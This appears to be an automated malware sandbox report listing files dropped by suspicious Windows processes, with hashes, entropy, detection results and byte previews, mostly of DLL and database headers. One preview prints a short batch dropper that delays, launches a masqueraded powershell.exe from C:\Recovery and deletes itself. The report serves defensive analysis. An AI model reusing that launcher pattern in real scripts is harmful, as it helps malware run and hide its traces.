                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):154
                                                                  Entropy (8bit):5.176493287052913
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7XzLJJLNIvBktKcKZG1t+kiE2J5xAIONGn:hCRLuVFOOr+DE7Xz9nIvKOZG1wkn23fH
                                                                  MD5:1062CFD4AB6AE45A3E6D22B4B7BD3E00
                                                                  SHA1:B293FE06D825331308585F1F9EF823EB05E1AF47
                                                                  SHA-256:95685D3B762F3C5ACEF0753368BCA3661B9A46641FC150ED0C77F64FDC02B8BE
                                                                  SHA-512:20779EEDA83D1E9D5C1BD9105ACB8CA0DA56ABD8C33DCC4D1F27E743938E03F7A463468BC29365479BC1EF349BAEC580FCEA656403ECCC4D00789F6DF5C6C0A8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\powershell.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\O7MNNZ56x3.bat"
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):106496
                                                                  Entropy (8bit):1.1358696453229276
                                                                  Encrypted:false
                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):5242880
                                                                  Entropy (8bit):0.037963276276857943
                                                                  Encrypted:false
                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x704, 10 symbols, created Thu Aug 1 04:14:33 2024, 1st section name ".debug$S"
                                                                  Category:dropped
                                                                  Size (bytes):1980
                                                                  Entropy (8bit):4.582461971530671
                                                                  Encrypted:false
                                                                  SSDEEP:24:Hbm9+XOgEbXtOfHmwKRfCWYNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+SUZ:kg4tylKJCWYEluOulajfqXSfbNtmh9Z
                                                                  MD5:E92146656DCACA9EA598280F82ECDC2F
                                                                  SHA1:697A4A671D2E9B9B6B09CF812EA8F344313228B6
                                                                  SHA-256:50B44586E58EB67E3E042B5D23A30B05767B5FD5CE099F9BBA60875C738AB3E9
                                                                  SHA-512:3108F92162DB671FB312B8BFC46BFC6446DB6215C6FE7C73093BA4CAC4624F5A5920C4AA08DBE08EAFE23A491FC55A4C2C97BF229FD064EAE9395C4939E9F6EC
                                                                  Malicious:false
                                                                  Preview:L......f.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........p...................@..@........<....c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP..................r.av..t.y..............3.......C:\Users\user\AppData\Local\Temp\RES6DA.tmp.-.<....................a..Microsoft (R) CVTRES.}.=..cwd.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu Aug 1 04:14:35 2024, 1st section name ".debug$S"
                                                                  Category:dropped
                                                                  Size (bytes):1372
                                                                  Entropy (8bit):4.095108991485689
                                                                  Encrypted:false
                                                                  SSDEEP:24:Hhq9s+fHvw3fHHwK9GofzNwI+ycuZhNdakSbPNnqS+d:cPswKDzm1ulda3RqSe
                                                                  MD5:FCFB87FBE197660FE5A401DFB1F1BB79
                                                                  SHA1:D3FDC9492DE7C9832F12860398DFA7ECD5BEF254
                                                                  SHA-256:9D0B84A467C318F216C4F77966EE023B35D1743827A8D8F5A0973675C1678830
                                                                  SHA-512:B4A8A75EFDABC56F39C94F7EC97D15F4AF55011AA18CB17FC9A80BFAC597E961875469624AFC6A8B67E3EEE61417BD1ED70EF5F991DD717A6594EA2E6AD77DB1
                                                                  Malicious:false
                                                                  Preview:L......f.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP...............^c's=..FV.T.............3.......C:\Users\user\AppData\Local\Temp\RESFC3.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.o.d.m.i.d.m.4...d.l.l.....(.....L.e.g.a.
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                  Category:dropped
                                                                  Size (bytes):159744
                                                                  Entropy (8bit):0.7873599747470391
                                                                  Encrypted:false
                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):98224
                                                                  Entropy (8bit):6.452201564717313
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                  MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                  SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                  SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                  SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):83736
                                                                  Entropy (8bit):6.595094797707322
                                                                  Encrypted:false
                                                                  SSDEEP:1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
                                                                  MD5:86D1B2A9070CD7D52124126A357FF067
                                                                  SHA1:18E30446FE51CED706F62C3544A8C8FDC08DE503
                                                                  SHA-256:62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
                                                                  SHA-512:7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):254744
                                                                  Entropy (8bit):6.564308911485739
                                                                  Encrypted:false
                                                                  SSDEEP:6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
                                                                  MD5:20C77203DDF9FF2FF96D6D11DEA2EDCF
                                                                  SHA1:0D660B8D1161E72C993C6E2AB0292A409F6379A5
                                                                  SHA-256:9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
                                                                  SHA-512:2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64792
                                                                  Entropy (8bit):6.223467179037751
                                                                  Encrypted:false
                                                                  SSDEEP:1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
                                                                  MD5:D4674750C732F0DB4C4DD6A83A9124FE
                                                                  SHA1:FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
                                                                  SHA-256:CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
                                                                  SHA-512:97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):158488
                                                                  Entropy (8bit):6.8491143497239655
                                                                  Encrypted:false
                                                                  SSDEEP:3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
                                                                  MD5:7447EFD8D71E8A1929BE0FAC722B42DC
                                                                  SHA1:6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
                                                                  SHA-256:60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
                                                                  SHA-512:C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):79128
                                                                  Entropy (8bit):6.284790077237953
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
                                                                  MD5:819166054FEC07EFCD1062F13C2147EE
                                                                  SHA1:93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
                                                                  SHA-256:E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
                                                                  SHA-512:DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                  Category:dropped
                                                                  Size (bytes):880569
                                                                  Entropy (8bit):5.682993312079324
                                                                  Encrypted:false
                                                                  SSDEEP:12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
                                                                  MD5:C4989BCEB9E7E83078812C9532BAEEA7
                                                                  SHA1:AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
                                                                  SHA-256:A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
                                                                  SHA-512:FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
                                                                  Malicious:false
                                                                  Preview:PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3450648
                                                                  Entropy (8bit):6.098075450035195
                                                                  Encrypted:false
                                                                  SSDEEP:98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
                                                                  MD5:9D7A0C99256C50AFD5B0560BA2548930
                                                                  SHA1:76BD9F13597A46F5283AA35C30B53C21976D0824
                                                                  SHA-256:9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
                                                                  SHA-512:CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):4458776
                                                                  Entropy (8bit):6.460390021076921
                                                                  Encrypted:false
                                                                  SSDEEP:49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
                                                                  MD5:63A1FA9259A35EAEAC04174CECB90048
                                                                  SHA1:0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
                                                                  SHA-256:14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
                                                                  SHA-512:896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):6361390
                                                                  Entropy (8bit):7.989449982411625
                                                                  Encrypted:false
                                                                  SSDEEP:196608:S8JwSNEMZM/LUuL/VLdu4IDrrp9ECJqIrE:S4jEMeIqd6DrrDLJNE
                                                                  MD5:E5DB23B3AAF4DDDD2BAF96FB7BBA9616
                                                                  SHA1:B4479AB38BB534CE5BBF9C6F3C89305BDCFF2CF7
                                                                  SHA-256:93BDF29408BE9CF5C1880F897F91CD475824E46B929CD947F32B8808A5903958
                                                                  SHA-512:541436C704D8789DAD962841B985EB84C251F5FAC7AD93DD318BC91A2C29885947F8D35AC99C03B3C3D6EC81D03AD25E01F85406F8F86BF05BD2D30244CE51DB
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):29976
                                                                  Entropy (8bit):6.627859470728624
                                                                  Encrypted:false
                                                                  SSDEEP:768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
                                                                  MD5:A653F35D05D2F6DEBC5D34DADDD3DFA1
                                                                  SHA1:1A2CEEC28EA44388F412420425665C3781AF2435
                                                                  SHA-256:DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
                                                                  SHA-512:5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\hacn.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1123608
                                                                  Entropy (8bit):5.3853088605790385
                                                                  Encrypted:false
                                                                  SSDEEP:12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
                                                                  MD5:81D62AD36CBDDB4E57A91018F3C0816E
                                                                  SHA1:FE4A4FC35DF240B50DB22B35824E4826059A807B
                                                                  SHA-256:1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
                                                                  SHA-512:7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):98224
                                                                  Entropy (8bit):6.452201564717313
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                  MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                  SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                  SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                  SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
